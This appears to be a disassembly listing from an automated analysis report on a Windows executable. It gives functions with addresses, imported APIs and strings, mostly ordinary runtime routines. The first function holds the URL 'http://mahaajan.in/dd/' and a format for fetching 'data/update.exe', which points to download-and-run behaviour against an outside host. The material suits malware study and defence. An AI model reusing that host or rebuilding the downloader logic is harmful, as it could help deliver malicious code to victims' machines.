00414F95 push 00401118h ASCII "http://mahaajan.in/dd/"
00414F9A push 00411BD4h ASCII "http://%s%sdata/update.exe"
00414F9F lea ecx, dword ptr [ebp-00001728h]
00414FA5 push ecx
00414FA6 call 004141C0h
00414FAB add esp, 0Ch
00414FB0 push 00000000h Count = 2
00414FB2 lea edx, dword ptr [ebp-00001728h]
00414FB8 push edx
00414FB9 push 00000000h
00414FBB call 00415030h
00414FC0 lea eax, dword ptr [ebp-00001728h]
00414FC6 push eax
00414FC7 call 00415120h
00414FCC add esp, 04h
00414FCF push 00000000h
00414FD1 call 00414AA0h
00414FD6 xor eax, eax xrefs 00414F93
00414FD8 mov esp, ebp xrefs 00414E09
00414FDA pop ebp
00414FDB retn 0004h function end
Function 00413B90, API count: 5, instr count: 114
APIs
  • getaddrinfo.WS2_32, ref: 00413BEF
  • getaddrinfo.WS2_32, ref: 00413C32
  • getaddrinfo.WS2_32, ref: 00413C6B
  • getaddrinfo.WS2_32, ref: 00413C8E
  • FreeAddrInfoW.WS2_32, ref: 00413CCD
Strings
  • 0.0.0.0, va: 00413CF0
  • ::0, va: 00413D00
  • 127.0.0.1, va: 00413D0C
  • ::1, va: 00413D20
Address Instruction Meta Information
00413B90 push ebp xrefs 00413EC7, 00413EF5
00413B91 mov ebp, esp
00413B93 add esp, FFFFFFD8h
00413B96 push ebx
00413B97 push esi
00413B98 push edi
00413B99 mov esi, ecx
00413B9B lea edi, dword ptr [ebp-28h]
00413B9E mov ecx, 00000008h
00413BA3 rep movsd
00413BA5 mov edi, edx
00413BA7 mov ebx, eax
00413BA9 mov esi, dword ptr [ebp+08h]
00413BAC xor eax, eax
00413BAE mov dword ptr [ebp-08h], eax
00413BB1 xor eax, eax
00413BB3 push ebp
00413BB4 push 00413CD4h
00413BB9 push dword ptr fs:[eax]
00413BBC mov dword ptr fs:[eax], esp
00413BBF mov eax, esi
00413BC1 xor ecx, ecx
00413BC3 mov edx, 0000001Ch
00413BC8 call 00403030h
00413BCD cmp dword ptr [ebp-20h], 03h
00413BD1 jne 00413BFDh
00413BD3 xor eax, eax
00413BD5 mov dword ptr [ebp-20h], eax
00413BD8 xor eax, eax
00413BDA mov dword ptr [ebp-1Ch], eax
00413BDD lea eax, dword ptr [ebp-08h]
00413BE0 push eax
00413BE1 lea eax, dword ptr [ebp-28h]
00413BE4 push eax
00413BE5 push 00000000h
00413BE7 mov eax, ebx
00413BE9 call 00404878h
00413BEE push eax
00413BEF call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413BF5 mov dword ptr [ebp-04h], eax
00413BF8 jmp 00413C97h
00413BFD mov eax, ebx xrefs 00413BD1
00413BFF mov edx, 00413CF0h ASCII "0.0.0.0"
00413C04 call 004047C4h
00413C09 je 00413C19h
00413C0B mov eax, ebx
00413C0D mov edx, 00413D00h ASCII "::0"
00413C12 call 004047C4h
00413C17 jne 00413C3Dh
00413C19 mov dword ptr [ebp-28h], 00000001h xrefs 00413C09
00413C20 lea eax, dword ptr [ebp-08h]
00413C23 push eax
00413C24 lea eax, dword ptr [ebp-28h]
00413C27 push eax
00413C28 mov eax, edi
00413C2A call 00404878h
00413C2F push eax
00413C30 push 00000000h
00413C32 call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C38 mov dword ptr [ebp-04h], eax
00413C3B jmp 00413C97h
00413C3D mov eax, ebx xrefs 00413C17
00413C3F mov edx, 00413D0Ch ASCII "127.0.0.1"
00413C44 call 004047C4h
00413C49 je 00413C59h
00413C4B mov eax, ebx
00413C4D mov edx, 00413D20h ASCII "::1"
00413C52 call 004047C4h
00413C57 jne 00413C76h
00413C59 lea eax, dword ptr [ebp-08h] xrefs 00413C49
00413C5C push eax
00413C5D lea eax, dword ptr [ebp-28h]
00413C60 push eax
00413C61 mov eax, edi
00413C63 call 00404878h
00413C68 push eax
00413C69 push 00000000h
00413C6B call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C71 mov dword ptr [ebp-04h], eax
00413C74 jmp 00413C97h
00413C76 lea eax, dword ptr [ebp-08h] xrefs 00413C57
00413C79 push eax
00413C7A lea eax, dword ptr [ebp-28h]
00413C7D push eax
00413C7E mov eax, edi
00413C80 call 00404878h
00413C85 push eax
00413C86 mov eax, ebx
00413C88 call 00404878h
00413C8D push eax
00413C8E call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C94 mov dword ptr [ebp-04h], eax
00413C97 cmp dword ptr [ebp-04h], 00000000h xrefs 00413C3B, 00413C74, 00413BF8
00413C9B jne 00413CB6h
00413C9D cmp dword ptr [ebp-08h], 00000000h
00413CA1 je 00413CB6h
00413CA3 mov eax, dword ptr [ebp-08h]
00413CA6 mov ecx, dword ptr [eax+10h]
00413CA9 mov edx, esi
00413CAB mov eax, dword ptr [ebp-08h]
00413CAE mov eax, dword ptr [eax+18h]
00413CB1 call 00402890h
00413CB6 xor eax, eax xrefs 00413C9B, 00413CA1
00413CB8 pop edx
00413CBA pop ecx Count = 2
00413CBB mov dword ptr fs:[eax], edx
00413CBE push 00413CDBh
00413CC3 cmp dword ptr [ebp-08h], 00000000h xrefs 00413CD9
00413CC7 je 00413CD3h
00413CC9 mov eax, dword ptr [ebp-08h]
00413CCC push eax
00413CCD call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00413CD3 ret xrefs 00413CC7 function end
Function 004040C4, API count: 0, instr count: 12
Address Instruction Meta Information
004040C4 mov dword ptr [0042C014h], 004011C8h xrefs 00406072
004040CE mov dword ptr [0042C018h], 004011D8h
004040D8 mov dword ptr [0042C638h], eax
004040DD xor eax, eax
004040DF mov dword ptr [0042C63Ch], eax
004040E4 mov dword ptr [0042C640h], edx
004040EA mov eax, dword ptr [edx+04h]
004040ED mov dword ptr [0042C02Ch], eax
004040F2 call 00403FBCh
004040F7 mov byte ptr [0042C034h], 00000000h
004040FE call 00404064h
00404103 ret function end
Function 0040B64C, API count: 2, instr count: 95
APIs
    • GetCPInfo.KERNEL32, ref: 0040B5ED
  • GetStringTypeExA.KERNEL32, ref: 0040B740
  • GetSystemMetrics.USER32, ref: 0040B76B
Address Instruction Meta Information
0040B64C push ebp xrefs 0040B7DE
0040B64D mov ebp, esp
0040B64F add esp, FFFFFE68h
0040B655 push ebx
0040B656 push esi
0040B657 push edi
0040B658 mov dword ptr [0042C738h], 00000409h
0040B662 mov dword ptr [0042C73Ch], 00000009h
0040B66C mov dword ptr [0042C740h], 00000001h
0040B676 call 004061ECh
0040B67B test eax, eax
0040B67D je 0040B684h
0040B67F mov dword ptr [0042C738h], eax
0040B684 test ax, ax xrefs 0040B67D
0040B687 je 0040B6A4h
0040B689 mov edx, eax
0040B68B and dx, 03FFh
0040B690 movzx edx, dx
0040B693 mov dword ptr [0042C73Ch], edx
0040B699 movzx eax, ax
0040B69C shr eax, 0Ah
0040B69F mov dword ptr [0042C740h], eax
0040B6A4 mov esi, 0040B7A0h xrefs 0040B687
0040B6A9 mov edi, 0042B130h
0040B6AE mov ecx, 00000008h
0040B6B3 rep movsd
0040B6B5 cmp dword ptr [0042B0E8h], 02h
0040B6BC jne 0040B769h
0040B6C2 call 0040B634h
0040B6C7 test al, al
0040B6C9 je 0040B6DEh
0040B6CB mov byte ptr [0042C745h], 00000000h
0040B6D2 mov byte ptr [0042C744h], 00000000h
0040B6D9 jmp 0040B797h
0040B6DE push ebp xrefs 0040B6C9
0040B6DF call 0040B5D4h
0040B6E4 pop ecx
0040B6E5 mov eax, 0042B130h
0040B6EA mov edx, 0040B7A0h
0040B6EF mov cl, 20h
0040B6F1 call 00403270h
0040B6F6 setne bl
0040B6F9 mov byte ptr [0042C744h], bl
0040B6FF test bl, bl
0040B701 je 0040B70Fh
0040B703 mov byte ptr [0042C745h], 00000000h
0040B70A jmp 0040B797h
0040B70F mov eax, 00000080h xrefs 0040B701
0040B714 lea edx, dword ptr [ebp-00000094h]
0040B71A mov byte ptr [edx], al xrefs 0040B723
0040B71C inc eax
0040B71D inc edx
0040B71E cmp eax, 00000100h
0040B723 jne 0040B71Ah
0040B725 lea eax, dword ptr [ebp-00000094h]
0040B72B lea edx, dword ptr [ebp-00000196h]
0040B731 push edx
0040B732 push 00000080h
0040B737 push eax
0040B738 push 00000002h
0040B73A mov eax, dword ptr [0042C738h] 00000409
0040B73F push eax
0040B740 call 004061E4h GetStringTypeExA@KERNEL32.DLL (Hidden Import)
0040B745 mov eax, 00000080h
0040B74A lea edx, dword ptr [ebp-00000196h]
0040B750 cmp word ptr [edx], 0002h xrefs 0040B765
0040B754 sete cl
0040B757 mov byte ptr [0042C745h], cl
0040B75D test cl, cl
0040B75F jne 0040B797h
0040B761 add edx, 02h
0040B764 dec eax
0040B765 jne 0040B750h
0040B767 jmp 0040B797h
0040B769 push 0000004Ah xrefs 0040B6BC
0040B76B call 004062BCh GetSystemMetrics@USER32.DLL (Hidden Import)
0040B770 test eax, eax
0040B772 setne al
0040B775 mov byte ptr [0042C745h], al
0040B77A push 0000002Ah
0040B77C call 004062BCh
0040B781 test eax, eax
0040B783 setne bl
0040B786 mov byte ptr [0042C744h], bl
0040B78C test bl, bl
0040B78E je 0040B797h
0040B790 push ebp
0040B791 call 0040B5D4h
0040B796 pop ecx
0040B797 pop edi xrefs 0040B78E, 0040B75F, 0040B767, 0040B70A, 0040B6D9
0040B798 pop esi
0040B799 pop ebx
0040B79A mov esp, ebp
0040B79C pop ebp
0040B79D ret function end
Function 004041DC, API count: 3, instr count: 38
APIs
  • GetStdHandle.KERNEL32, ref: 00404215
  • WriteFile.KERNEL32, ref: 0040421B
  • MessageBoxA.USER32, ref: 00404254
Strings
  • Error, va: 0042B08C
  • Runtime error at 00000000, va: 0042B094
Address Instruction Meta Information
004041DC push ecx xrefs 004042A5
004041DD cmp byte ptr [0042C044h], 00000000h
004041E4 je 0040423Dh
004041E6 cmp word ptr [0042C218h], D7B2h
004041EF jne 00404205h
004041F1 cmp dword ptr [0042C220h], 00000000h
004041F8 jbe 00404205h
004041FA mov eax, 0042C214h
004041FF call dword ptr [0042C230h]
00404205 push 00000000h xrefs 004041EF, 004041F8
00404207 lea eax, dword ptr [esp+04h]
0040420B push eax
0040420C push 0000001Eh
0040420E push 0042B094h ASCII "Runtime error at 00000000"
00404213 push FFFFFFF5h
00404215 call 004011C0h GetStdHandle@KERNEL32.DLL (Hidden Import)
0040421A push eax
0040421B call 004011F8h WriteFile@KERNEL32.DLL (Hidden Import)
00404220 push 00000000h
00404222 lea eax, dword ptr [esp+04h]
00404226 push eax
00404227 push 00000002h
00404229 push 00404264h
0040422E push FFFFFFF5h
00404230 call 004011C0h
00404235 push eax
00404236 call 004011F8h
0040423B pop edx
0040423C ret function end
0040423D cmp byte ptr [0042B034h], 00000000h xrefs 004041E4
00404244 jne 00404259h
00404246 push 00000000h
00404248 push 0042B08Ch ASCII "Error"
0040424D push 0042B094h ASCII "Runtime error at 00000000"
00404252 push 00000000h
00404254 call 00401220h MessageBoxA@USER32.DLL (Hidden Import)
00404259 pop edx xrefs 00404244
0040425A ret function end
Function 00402FE4, API count: 1, instr count: 29
APIs
  • GetFileSize.KERNEL32, ref: 00403000
Address Instruction Meta Information
00402FE4 push ebx xrefs 00402F87
00402FE5 push esi
00402FE6 mov ebx, eax
00402FE8 or esi, FFFFFFFFh
00402FEB mov ax, word ptr [ebx+04h]
00402FEF cmp ax, 0000D7B0h
00402FF3 jbe 0040301Eh
00402FF5 cmp ax, 0000D7B3h
00402FF9 jnbe 0040301Eh
00402FFB push 00000000h
00402FFD mov eax, dword ptr [ebx]
00402FFF push eax
00403000 call 004011B8h GetFileSize@KERNEL32.DLL (Hidden Import)
00403005 mov esi, eax
00403007 cmp esi, FFFFFFFFh
0040300A jne 00403013h
0040300C call 00402820h
00403011 jmp 00403028h
00403013 mov eax, esi xrefs 0040300A
00403015 xor edx, edx
00403017 div dword ptr [ebx+08h]
0040301A mov esi, eax
0040301C jmp 00403028h
0040301E mov eax, 00000067h xrefs 00402FF3, 00402FF9
00403023 call 00402810h
00403028 mov eax, esi xrefs 0040301C, 00403011
0040302A pop esi
0040302B pop ebx
0040302C ret function end
Function 00407A10, API count: 1, instr count: 21
APIs
  • GetFullPathNameA.KERNEL32, ref: 00407A2F
Address Instruction Meta Information
00407A10 push ebx xrefs 0041234F, 004122EA
00407A11 push esi
00407A12 add esp, FFFFFEF8h
00407A18 mov esi, edx
00407A1A mov ebx, eax
00407A1C push esp
00407A1D lea eax, dword ptr [esp+08h]
00407A21 push eax
00407A22 push 00000104h
00407A27 mov eax, ebx
00407A29 call 00404878h
00407A2E push eax
00407A2F call 004061A4h GetFullPathNameA@KERNEL32.DLL (Hidden Import)
00407A34 mov ecx, eax
00407A36 lea edx, dword ptr [esp+04h]
00407A3A mov eax, esi
00407A3C call 004044CCh
00407A41 add esp, 00000108h
00407A47 pop esi
00407A48 pop ebx
00407A49 ret function end
Function 0040BCE0, API count: 1, instr count: 11
APIs
  • GetCurrentThreadId.KERNEL32, ref: 0040BCE4
Address Instruction Meta Information
0040BCE0 push ebp xrefs 0040BD04, 0040BD85
0040BCE1 mov ebp, esp
0040BCE3 push ecx
0040BCE4 call 00406184h GetCurrentThreadId@KERNEL32.DLL (Hidden Import)
0040BCE9 mov word ptr [ebp-02h], ax
0040BCED mov al, byte ptr [ebp-02h]
0040BCF0 xor al, byte ptr [ebp-01h]
0040BCF3 and al, 0Fh
0040BCF5 pop ecx
0040BCF6 pop ebp
0040BCF7 ret function end
Function 00412EFC, API count: 1, instr count: 11
APIs
    • ResetEvent.KERNEL32, ref: 00412EF6
  • WaitForSingleObject.KERNEL32, ref: 00412F06
Address Instruction Meta Information
00412EFC push ebx xrefs 00412F85
00412EFD mov ebx, eax
00412EFF push ebx
00412F00 mov eax, dword ptr [0042C848h] 00000048
00412F05 push eax
00412F06 call 0040629Ch WaitForSingleObject@KERNEL32.DLL (Hidden Import)
00412F0B test eax, eax
00412F0D jne 00412F14h
00412F0F call 00412EF0h
00412F14 pop ebx xrefs 00412F0D
00412F15 ret function end
Function 0040A678, API count: 3, instr count: 102
APIs
  • VirtualQuery.KERNEL32, ref: 0040A695
  • GetModuleFileNameA.KERNEL32, ref: 0040A6D4
  • LoadStringA.USER32, ref: 0040A76A
Address Instruction Meta Information
0040A678 push ebp xrefs 0040A80F
0040A679 mov ebp, esp
0040A67B add esp, FFFFFBA8h
0040A681 push ebx
0040A682 push esi
0040A683 push edi
0040A684 mov dword ptr [ebp-04h], ecx
0040A687 mov ebx, edx
0040A689 mov esi, eax
0040A68B push 0000001Ch
0040A68D lea eax, dword ptr [ebp-00000330h]
0040A693 push eax
0040A694 push ebx
0040A695 call 00406294h VirtualQuery@KERNEL32.DLL (Hidden Import)
0040A69A cmp dword ptr [ebp-00000320h], 00001000h
0040A6A4 jne 0040A6C2h
0040A6A6 push 00000105h
0040A6AB lea eax, dword ptr [ebp-00000212h]
0040A6B1 push eax
0040A6B2 mov eax, dword ptr [ebp-0000032Ch]
0040A6B8 push eax
0040A6B9 call 004061C4h
0040A6BE test eax, eax
0040A6C0 jne 0040A6E5h
0040A6C2 push 00000105h xrefs 0040A6A4
0040A6C7 lea eax, dword ptr [ebp-00000212h]
0040A6CD push eax
0040A6CE mov eax, dword ptr [0042C660h] 00400000
0040A6D3 push eax
0040A6D4 call 004061C4h GetModuleFileNameA@KERNEL32.DLL (Hidden Import)
0040A6D9 mov eax, ebx
0040A6DB call 0040A66Ch
0040A6E0 mov dword ptr [ebp-08h], eax
0040A6E3 jmp 0040A6EEh
0040A6E5 sub ebx, dword ptr [ebp-0000032Ch] xrefs 0040A6C0
0040A6EB mov dword ptr [ebp-08h], ebx
0040A6EE lea eax, dword ptr [ebp-00000212h] xrefs 0040A6E3
0040A6F4 mov dl, 5Ch
0040A6F6 call 0040B4F8h
0040A6FB mov edx, eax
0040A6FD inc edx
0040A6FE lea eax, dword ptr [ebp-0000010Dh]
0040A704 mov ecx, 00000104h
0040A709 call 00407AE8h
0040A70E mov ebx, 0040A7F8h
0040A713 mov edi, 0040A7F8h
0040A718 mov eax, esi
0040A71A mov edx, dword ptr [00406664h] 004066B0
0040A720 call 00403894h
0040A725 test al, al
0040A727 je 0040A74Ah
0040A729 mov eax, dword ptr [esi+04h]
0040A72C call 00404878h
0040A731 mov ebx, eax
0040A733 mov eax, ebx
0040A735 call 00407AC0h
0040A73A test eax, eax
0040A73C je 0040A74Ah
0040A73E cmp byte ptr [ebx+eax-01h], 0000002Eh
0040A743 je 0040A74Ah
0040A745 mov edi, 0040A7FCh
0040A74A push 00000100h xrefs 0040A727, 0040A73C, 0040A743
0040A74F lea eax, dword ptr [ebp-00000312h]
0040A755 push eax
0040A756 mov eax, dword ptr [0042B968h] 00406414
0040A75B mov eax, dword ptr [eax+04h]
0040A75E push eax
0040A75F mov eax, dword ptr [0042C660h] 00400000
0040A764 call 00405328h
0040A769 push eax
0040A76A call 004062C4h LoadStringA@USER32.DLL (Hidden Import)
0040A76F lea edx, dword ptr [ebp-00000458h]
0040A775 mov eax, dword ptr [esi]
0040A777 call 00403680h
0040A77C lea eax, dword ptr [ebp-00000458h]
0040A782 mov dword ptr [ebp-00000358h], eax
0040A788 mov byte ptr [ebp-00000354h], 00000004h
0040A78F lea eax, dword ptr [ebp-0000010Dh]
0040A795 mov dword ptr [ebp-00000350h], eax
0040A79B mov byte ptr [ebp-0000034Ch], 00000006h
0040A7A2 mov eax, dword ptr [ebp-08h]
0040A7A5 mov dword ptr [ebp-00000348h], eax
0040A7AB mov byte ptr [ebp-00000344h], 00000005h
0040A7B2 mov dword ptr [ebp-00000340h], ebx
0040A7B8 mov byte ptr [ebp-0000033Ch], 00000006h
0040A7BF mov dword ptr [ebp-00000338h], edi
0040A7C5 mov byte ptr [ebp-00000334h], 00000006h
0040A7CC lea eax, dword ptr [ebp-00000358h]
0040A7D2 push eax
0040A7D3 push 00000004h
0040A7D5 lea ecx, dword ptr [ebp-00000312h]
0040A7DB mov edx, dword ptr [ebp+08h]
0040A7DE mov eax, dword ptr [ebp-04h]
0040A7E1 call 00408008h
0040A7E6 mov eax, dword ptr [ebp-04h]
0040A7E9 call 00407AC0h
0040A7EE pop edi
0040A7EF pop esi
0040A7F0 pop ebx
0040A7F1 mov esp, ebp
0040A7F3 pop ebp
0040A7F4 retn 0004h function end
Function 00401ACC, API count: 3, instr count: 62
APIs
  • LocalFree.KERNEL32, ref: 00401B0B
  • VirtualFree.KERNEL32, ref: 00401B2A
  • RtlDeleteCriticalSection.NTDLL, ref: 00401B9C
Address Instruction Meta Information
00401ACC push ebp xrefs 00405E83
00401ACD mov ebp, esp
00401ACF push ebx
00401AD0 cmp byte ptr [0042C5BCh], 00000000h
00401AD7 je 00401BA9h
00401ADD xor edx, edx
00401ADF push ebp
00401AE0 push 00401BA2h
00401AE5 push dword ptr fs:[edx]
00401AE8 mov dword ptr fs:[edx], esp
00401AEB cmp byte ptr [0042C045h], 00000000h
00401AF2 je 00401AFEh
00401AF4 push 0042C5C4h
00401AF9 call 00401364h
00401AFE mov byte ptr [0042C5BCh], 00000000h xrefs 00401AF2
00401B05 mov eax, dword ptr [0042C61Ch] 00000000
00401B0A push eax
00401B0B call 00401344h LocalFree@KERNEL32.DLL (Hidden Import)
00401B10 xor eax, eax
00401B12 mov dword ptr [0042C61Ch], eax
00401B17 mov ebx, dword ptr [0042C5E4h] 0042C5E4
00401B1D jmp 00401B31h
00401B1F push 00008000h xrefs 00401B37
00401B24 push 00000000h
00401B26 mov eax, dword ptr [ebx+08h]
00401B29 push eax
00401B2A call 00401354h VirtualFree@KERNEL32.DLL (Import)
00401B2F mov ebx, dword ptr [ebx]
00401B31 cmp ebx, 0042C5E4h xrefs 00401B1D
00401B37 jne 00401B1Fh
00401B39 mov eax, 0042C5E4h
00401B3E call 004013CCh
00401B43 mov eax, 0042C5F4h
00401B48 call 004013CCh
00401B4D mov eax, 0042C620h
00401B52 call 004013CCh
00401B57 mov eax, dword ptr [0042C5DCh] 00000000
00401B5C test eax, eax
00401B5E je 00401B77h
00401B60 mov edx, dword ptr [eax] xrefs 00401B75
00401B62 mov dword ptr [0042C5DCh], edx
00401B68 push eax
00401B69 call 00401344h
00401B6E mov eax, dword ptr [0042C5DCh] 00000000
00401B73 test eax, eax
00401B75 jne 00401B60h
00401B77 xor eax, eax xrefs 00401B5E
00401B79 pop edx
00401B7B pop ecx Count = 2
00401B7C mov dword ptr fs:[eax], edx
00401B7F push 00401BA9h
00401B84 cmp byte ptr [0042C045h], 00000000h xrefs 00401BA7
00401B8B je 00401B97h
00401B8D push 0042C5C4h
00401B92 call 0040136Ch
00401B97 push 0042C5C4h xrefs 00401B8B
00401B9C call 00401374h RtlDeleteCriticalSection@NTDLL.DLL (Hidden Import)
00401BA1 ret function end
00401BA9 pop ebx xrefs 00401AD7
00401BAA pop ebp
00401BAB ret function end
Function 0040A10C, API count: 1, instr count: 29
APIs
  • GetLocaleInfoA.KERNEL32, ref: 0040A12A
Address Instruction Meta Information
0040A10C push ebp xrefs 0040A19C, 0040A3BB, 0040A482, 0040B80A, 0040B82C, 0040B850, 0040B89A, 0040B8D1, 0040B8FE, 0040B93E, 0040B960, 0040B992, 0040B9D1, 0040B9F4
0040A10D mov ebp, esp
0040A10F add esp, FFFFFF00h
0040A115 push ebx
0040A116 push esi
0040A117 mov esi, ecx
0040A119 mov ebx, dword ptr [ebp+08h]
0040A11C push 00000100h
0040A121 lea ecx, dword ptr [ebp-00000100h]
0040A127 push ecx
0040A128 push edx
0040A129 push eax
0040A12A call 004061BCh GetLocaleInfoA@KERNEL32.DLL (Hidden Import)
0040A12F test eax, eax
0040A131 jle 0040A145h
0040A133 mov ecx, eax
0040A135 dec ecx
0040A136 lea edx, dword ptr [ebp-00000100h]
0040A13C mov eax, ebx
0040A13E call 004044CCh
0040A143 jmp 0040A14Eh
0040A145 mov eax, ebx xrefs 0040A131
0040A147 mov edx, esi
0040A149 call 00404430h
0040A14E pop esi xrefs 0040A143
0040A14F pop ebx
0040A150 mov esp, ebp
0040A152 pop ebp
0040A153 retn 0004h function end
Function 0040B560, API count: 1, instr count: 37
APIs
  • GetACP.KERNEL32, ref: 0040B59F
Address Instruction Meta Information
0040B560 push ebp xrefs 0040B5E7
0040B561 mov ebp, esp
0040B563 add esp, FFFFFFF4h
0040B566 push ebx
0040B567 xor edx, edx
0040B569 mov dword ptr [ebp-0Ch], edx
0040B56C xor edx, edx
0040B56E push ebp
0040B56F push 0040B5C4h
0040B574 push dword ptr fs:[edx]
0040B577 mov dword ptr fs:[edx], esp
0040B57A push 00000007h
0040B57C lea edx, dword ptr [ebp-07h]
0040B57F push edx
0040B580 push 00001004h
0040B585 push eax
0040B586 call 004061BCh
0040B58B lea eax, dword ptr [ebp-0Ch]
0040B58E lea edx, dword ptr [ebp-07h]
0040B591 mov ecx, 00000007h
0040B596 call 0040464Ch
0040B59B mov eax, dword ptr [ebp-0Ch]
0040B59E push eax
0040B59F call 00406174h GetACP@KERNEL32.DLL (Hidden Import)
0040B5A4 mov edx, eax
0040B5A6 pop eax
0040B5A7 call 00407608h
0040B5AC mov ebx, eax
0040B5AE xor eax, eax
0040B5B0 pop edx
0040B5B2 pop ecx Count = 2
0040B5B3 mov dword ptr fs:[eax], edx
0040B5B6 push 0040B5CBh
0040B5BB lea eax, dword ptr [ebp-0Ch] xrefs 0040B5C9
0040B5BE call 004043DCh
0040B5C3 ret function end
Function 00412EF0, API count: 1, instr count: 4
APIs
  • ResetEvent.KERNEL32, ref: 00412EF6
Address Instruction Meta Information
00412EF0 mov eax, dword ptr [0042C848h] 00000048 xrefs 00412F8C, 00412F0F
00412EF5 push eax
00412EF6 call 00406264h ResetEvent@KERNEL32.DLL (Hidden Import)
00412EFB ret function end
Function 0040F4F8, API count: 1, instr count: 42
APIs
  • InitializeCriticalSection.KERNEL32, ref: 0040F586
Address Instruction Meta Information
0040F4F8 push ebp
0040F4F9 mov ebp, esp
0040F4FB xor eax, eax
0040F4FD push ebp
0040F4FE push 0040F599h
0040F503 push dword ptr fs:[eax]
0040F506 mov dword ptr fs:[eax], esp
0040F509 sub dword ptr [0042C818h], 01h
0040F510 jnc 0040F58Bh
0040F512 mov eax, 0042C7F8h
0040F517 call 0040F0F4h
0040F51C mov eax, 0040D834h
0040F521 mov dword ptr [0042C808h], eax
0040F526 mov eax, 0040D45Ch
0040F52B mov dword ptr [0042C80Ch], eax
0040F530 mov edx, 0040D36Ch
0040F535 mov dword ptr [0042C810h], edx
0040F53B mov dword ptr [0042C814h], eax
0040F540 mov eax, 0040DB20h
0040F545 mov edx, dword ptr [0042B870h] 0042B010
0040F54B mov dword ptr [edx], eax
0040F54D mov eax, 0040EDE8h
0040F552 mov edx, dword ptr [0042B790h] 0042B014
0040F558 mov dword ptr [edx], eax
0040F55A mov eax, 0040DE34h
0040F55F mov edx, dword ptr [0042B8BCh] 0042B018
0040F565 mov dword ptr [edx], eax
0040F567 mov eax, 0040E160h
0040F56C mov edx, dword ptr [0042B964h] 0042B01C
0040F572 mov dword ptr [edx], eax
0040F574 mov eax, 0040E888h
0040F579 mov edx, dword ptr [0042B8C8h] 0042B020
0040F57F mov dword ptr [edx], eax
0040F581 push 0042C820h
0040F586 call 00406234h InitializeCriticalSection@KERNEL32.DLL (Hidden Import)
0040F58B xor eax, eax xrefs 0040F510
0040F58D pop edx
0040F58F pop ecx Count = 2
0040F590 mov dword ptr fs:[eax], edx
0040F593 push 0040F5A0h
0040F598 ret xrefs 0040F59E function end
Function 004052E0, API count: 0, instr count: 26
Address Instruction Meta Information
004052E0 push ebx xrefs 00405343
004052E1 push esi
004052E2 add esp, FFFFFEF8h
004052E8 mov ebx, eax
004052EA cmp dword ptr [ebx+10h], 00000000h
004052EE jne 0040531Bh
004052F0 push 00000105h
004052F5 lea eax, dword ptr [esp+04h]
004052F9 push eax
004052FA mov eax, dword ptr [ebx+04h]
004052FD push eax
004052FE call 00401258h
00405303 mov eax, esp
00405305 mov dl, 01h
00405307 call 0040551Ch
0040530C mov esi, eax
0040530E mov dword ptr [ebx+10h], esi
00405311 test esi, esi
00405313 jne 0040531Bh
00405315 mov eax, dword ptr [ebx+04h]
00405318 mov dword ptr [ebx+10h], eax
0040531B mov eax, dword ptr [ebx+10h] xrefs 004052EE, 00405313
0040531E add esp, 00000108h
00405324 pop esi
00405325 pop ebx
00405326 ret function end
Function 00412218, API count: 1, instr count: 17
APIs
  • SetEndOfFile.KERNEL32, ref: 00412231
Address Instruction Meta Information
00412218 push ebp
00412219 mov ebp, esp
0041221B push ebx
0041221C mov ebx, eax
0041221E push dword ptr [ebp+0Ch]
00412221 push dword ptr [ebp+08h]
00412224 xor edx, edx
00412226 mov eax, ebx
00412228 mov ecx, dword ptr [eax]
0041222A call dword ptr [ecx+18h]
0041222D mov eax, dword ptr [ebx+04h]
00412230 push eax
00412231 call 00406274h SetEndOfFile@KERNEL32.DLL (Hidden Import)
00412236 call 0040BBDCh
0041223B pop ebx
0041223C pop ebp
0041223D retn 0008h function end
Function 00421CB8, API count: 1, instr count: 41
APIs
  • SHGetSpecialFolderPathA.SHELL32, ref: 00421CEF
Address Instruction Meta Information
00421CB8 push ebp xrefs 00421E40, 00422267, 00422017, 00429E73
00421CB9 mov ebp, esp
00421CBB push 00000000h
00421CBD push ebx
00421CBE push esi
00421CBF mov esi, edx
00421CC1 mov ebx, eax
00421CC3 xor eax, eax
00421CC5 push ebp
00421CC6 push 00421D27h
00421CCB push dword ptr fs:[eax]
00421CCE mov dword ptr fs:[eax], esp
00421CD1 lea eax, dword ptr [ebp-04h]
00421CD4 mov edx, 00000104h
00421CD9 call 004049A8h
00421CDE push 00000001h
00421CE0 movzx eax, bx
00421CE3 push eax
00421CE4 mov eax, dword ptr [ebp-04h]
00421CE7 call 00404878h
00421CEC push eax
00421CED push 00000000h
00421CEF call 00421B94h SHGetSpecialFolderPathA@SHELL32.DLL (Import)
00421CF4 test al, al
00421CF6 jne 00421D00h
00421CF8 lea eax, dword ptr [ebp-04h]
00421CFB call 004043DCh
00421D00 mov eax, dword ptr [ebp-04h] xrefs 00421CF6
00421D03 call 00404878h
00421D08 mov edx, eax
00421D0A mov eax, esi
00421D0C call 004045D4h
00421D11 xor eax, eax
00421D13 pop edx
00421D15 pop ecx Count = 2
00421D16 mov dword ptr fs:[eax], edx
00421D19 push 00421D2Eh
00421D1E lea eax, dword ptr [ebp-04h] xrefs 00421D2C
00421D21 call 004043DCh
00421D26 ret function end
Function 004043D4, API count: 1, instr count: 3
APIs
  • ExitThread.KERNEL32, ref: 004043D5
Address Instruction Meta Information
004043D4 push eax xrefs 0041316C
004043D5 call 00401210h ExitThread@KERNEL32.DLL (Hidden Import)
004043DA ret function end
Function 004077F4, API count: 1, instr count: 33
APIs
  • CreateFileA.KERNEL32, ref: 00407842
Address Instruction Meta Information
004077F4 push ebx xrefs 00412334
004077F5 push esi
004077F6 push edi
004077F7 mov ebx, edx
004077F9 mov edi, eax
004077FB or eax, FFFFFFFFh
004077FE mov esi, ebx
00407800 and esi, 03h
00407803 cmp esi, 02h
00407806 jnbe 00407847h
00407808 mov edx, ebx
0040780A and edx, 000000F0h
00407810 cmp edx, 40h
00407813 jnbe 00407847h
00407815 push 00000000h
00407817 push 00000080h
0040781C push 00000003h
0040781E push 00000000h
00407820 mov eax, ebx
00407822 and eax, 000000F0h
00407827 shr eax, 04h
0040782A mov eax, dword ptr [0042B16Ch+eax*4]
00407831 push eax
00407832 mov eax, dword ptr [0042B160h+esi*4]
00407839 push eax
0040783A mov eax, edi
0040783C call 00404878h
00407841 push eax
